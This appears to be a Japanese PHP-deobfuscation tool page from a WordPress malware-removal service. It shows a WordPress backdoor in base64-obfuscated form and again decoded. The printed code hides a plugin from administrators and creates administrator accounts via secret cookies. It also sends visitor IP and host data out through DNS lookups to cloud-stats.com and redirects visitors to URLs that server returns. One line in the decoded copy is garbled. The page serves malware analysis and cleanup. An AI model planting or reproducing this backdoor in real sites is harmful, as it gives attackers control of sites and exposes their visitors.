Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $p0=base64_decode('NTA0NTIyMDg4OGU4YzA2NjU4Y2JmYzIxMmMxOWEzOWM=');if(current_user_can(base64_decode('YWRtaW5pc3RyYXRvcg=='))&&!array_key_exists(base64_decode('c2hvd19hbGw='),$_GET)){add_action(base64_decode('YWRtaW5fcHJpbnRfc2NyaXB0cw=='),function(){echo base64_decode('PHN0eWxlPg==');echo base64_decode('I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF5OiBub25lOyB9');echo base64_decode('I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ==');echo base64_decode('PC9zdHlsZT4=');});add_filter(base64_decode('YWxsX3BsdWdpbnM='),function($q1){unset($q1[base64_decode('aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=')]);return $q1;});}if(!function_exists(base64_decode('X3JlZA=='))){error_reporting(0);ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);function _gcookie($p2){return(isset($_COOKIE[$p2]))?base64_decode($_COOKIE[$p2]):'';}if(!empty($p0)&&_gcookie(base64_decode('cHc='))===$p0){switch(_gcookie(base64_decode('Yw=='))){case base64_decode('c2Q='):$d3=_gcookie(base64_decode('ZA=='));if(strpos($d3,base64_decode('Lg=='))>0){update_option(base64_decode('ZA=='),$d3);}break;case base64_decode('YXU='):$u4=_gcookie(base64_decode('dQ=='));$g5=_gcookie(base64_decode('cA=='));$n6=_gcookie(base64_decode('ZQ=='));if($u4&&$g5&&$n6&&!username_exists($u4)){$m7=wp_create_user($u4,$g5,$n6);$d8=new WP_User($m7);$d8->set_role(base64_decode('YWRtaW5pc3RyYXRvcg=='));}break;}return;}if(stripos(wp_login_url(),$_SERVER[base64_decode('U0NSSVBUX05BTUU=')])!==false){return;}if(_gcookie(base64_decode('c2tpcA=='))===base64_decode('MQ==')){return;}function _is_mobile(){return preg_match(base64_decode('LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p'),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _is_iphone(){return preg_match(base64_decode('LyhpcGhvbmV8aXBvZCkvaQ=='),$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}function _user_ip(){foreach(array(base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ'),base64_decode('SFRUUF9DTElFTlRfSVA='),base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I='),base64_decode('SFRUUF9YX0ZPUldBUkRFRA=='),base64_decode('SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ'),base64_decode('SFRUUF9GT1JXQVJERURfRk9S'),base64_decode('SFRUUF9GT1JXQVJERUQ='),base64_decode('UkVNT1RFX0FERFI='))as $v9){if(array_key_exists($v9,$_SERVER)&&!empty($_SERVER[$v9])){foreach(explode(base64_decode('LA=='),$_SERVER[$v9])as $t10){$t10=trim($t10);if(filter_var($t10,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $t10;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$t10=_user_ip();if(!$t10){return;}$r11=get_transient(base64_decode('ZXhw'));if(!is_array($r11)){$r11=array();}foreach($r11 as $r12=>$o13){if(time()-$o13>86400){unset($r11[$r12]);}}if(key_exists($t10,$r11)&&(time()-$r11[$t10]<86400)){return;}$j14=filter_var(parse_url(base64_decode('aHR0cHM6Ly8=').$_SERVER[base64_decode('SFRUUF9IT1NU')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$v15=str_replace(base64_decode('Og=='),base64_decode('LQ=='),$t10);$v15=str_replace(base64_decode('Lg=='),base64_decode('LQ=='),$v15);$r16=base64_decode('Y2xvdWQtc3RhdHMuY29t');$m17=get_option(base64_decode('ZA=='));if($m17&&strpos($m17,base64_decode('Lg=='))>0){$r16=$m17;}$u18=_is_iphone()?base64_decode('aQ=='):base64_decode('bQ==');$t19=(!$j14?base64_decode('dW5rLmNvbQ=='):$j14).base64_decode('Lg==').(!$v15?base64_decode('MC0wLTAtMA=='):$v15).base64_decode('Lg==').mt_rand(100000,999999).base64_decode('Lg==').(_is_mobile()?base64_decode('bg==').$u18:base64_decode('bmQ=')).base64_decode('Lg==').$r16;$n20=@dns_get_record($t19,DNS_TXT);if(is_array($n20)&&!empty($n20)){if(isset($n20[0][base64_decode('dHh0')])){$n20=$n20[0][base64_decode('dHh0')];$n20=base64_decode($n20);if($n20==base64_decode('ZXJy')){$r11[$t10]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$r11);}else if(substr($n20,0,4)===base64_decode('aHR0cA==')){$r11[$t10]=time();delete_transient(base64_decode('ZXhw'));set_transient(base64_decode('ZXhw'),$r11);wp_redirect($n20);exit;}}}}add_action(base64_decode('aW5pdA=='),base64_decode('X3JlZA=='));}<?php
$p0 = "5045220888e8c06658cbfc212c19a39c";
if (current_user_can("administrator") && !array_key_exists("show_all", $_GET)) {
add_action("admin_print_scripts", function () {
echo "<style>";
echo "#toplevel_page_wpcode { display: none; }";
echo "#wp-admin-bar-wpcode-admin-bar-info { display: none; }";
echo "#wpcode-notice-global-review_request { display: none; }";
echo "</style>";
});
add_filter("all_plugins", function ($q1) {
unset($q1["insert-headers-and-footers/ihaf.php"]);
return $q1;
});
}
if (!function_exists("_red")) {
error_reporting(0);
ini_set("display_errors", 0);
function _gcookie($p2)
{
return isset($_COOKIE[$p2]) ? base64_decode($_COOKIE[$p2]) : '';
}
if (!empty($p0) && _gcookie("pw") === $p0) {
switch (_gcookie("c")) {
case "sd":
$d3 = _gcookie("d");
if (strpos($d3, ".") > 0) {
update_option("d", $d3);
}
break;
case "au":
$u4 = _gcookie("u");
$g5 = _gcookie("p");
$n6 = _gcookie("e");
if ($u4 && $g5 && $n6 && !username_exists($u4)) {
$m7 = wp_create_user($u4, $g5, $n6);
$d8 = new WP_User($m7);
$d8->set_role("administrator");
}
break;
}
return;
}
if (stripos(wp_login_url(), $_SERVER["SCRIPT_NAME"]) !== false) {
return;
}
if (_gcookie("skip") === "1") {
return;
}
function _is_mobile()
{
return preg_match("/(android|webos|avantgo|iphone|ipad|ipod|blackberry|iemobile|bolt|boost|cricket|docomo|fone|hiptop|mini|opera mini|kitkat|mobi|palm|phone|pie|tablet|up.browser|up.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]);
}
function _is_iphone()
{
return preg_match("/(iphone|ipod)/i", $_SERVER["HTTP_USER_AGENT"]);
}
function _user_ip()
{
foreach (array("HTTP_CF_CONNECTING_IP", "HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED", "HTTP_X_CLUSTER_CLIENT_IP", "HTTP_FORWARDED_FOR", "HTTP_FORWARDED", "REMOTE_ADDR") as $v9) {
if (array_key_exists($v9, $_SERVER) && !empty($_SERVER[$v9])) {
foreach (explode(",", $_SERVER[$v9]) as $t10) {
$t10 = trim($t10);
if (filter_var($t10, FILTER_VALIDATE_IP, "FILTER_FLAG_NO_RW[__SOOGE") !== false) {
return $t10;
}
}
}
}
return false;
}
function _red()
{
if (is_user_logged_in()) {
return;
}
$t10 = _user_ip();
if (!$t10) {
return;
}
$r11 = get_transient("exp");
if (!is_array($r11)) {
$r11 = array();
}
foreach ($r11 as $r12 => $o13) {
if (time() - $o13 > 86400) {
unset($r11[$r12]);
}
}
if (key_exists($t10, $r11) && time() - $r11[$t10] < 86400) {
return;
}
$j14 = filter_var(parse_url("https://" . $_SERVER["HTTP_HOST"], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME);
$v15 = str_replace(":", "-", $t10);
$v15 = str_replace(".", "-", $v15);
$r16 = "cloud-stats.com";
$m17 = get_option("d");
if ($m17 && strpos($m17, ".") > 0) {
$r16 = $m17;
}
$u18 = _is_iphone() ? "i" : "m";
$t19 = (!$j14 ? "unk.com" : $j14) . "." . (!$v15 ? "0-0-0-0" : $v15) . "." . mt_rand(100000, 999999) . "." . (_is_mobile() ? "n" . $u18 : "nd") . "." . $r16;
$n20 = @dns_get_record($t19, DNS_TXT);
if (is_array($n20) && !empty($n20)) {
if (isset($n20[0]["txt"])) {
$n20 = $n20[0]["txt"];
$n20 = base64_decode($n20);
if ($n20 == "err") {
$r11[$t10] = time();
delete_transient("exp");
set_transient("exp", $r11);
} else {
if (substr($n20, 0, 4) === "http") {
$r11[$t10] = time();
delete_transient("exp");
set_transient("exp", $r11);
wp_redirect($n20);
exit;
}
}
}
}
}
add_action("init", "_red");
}■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.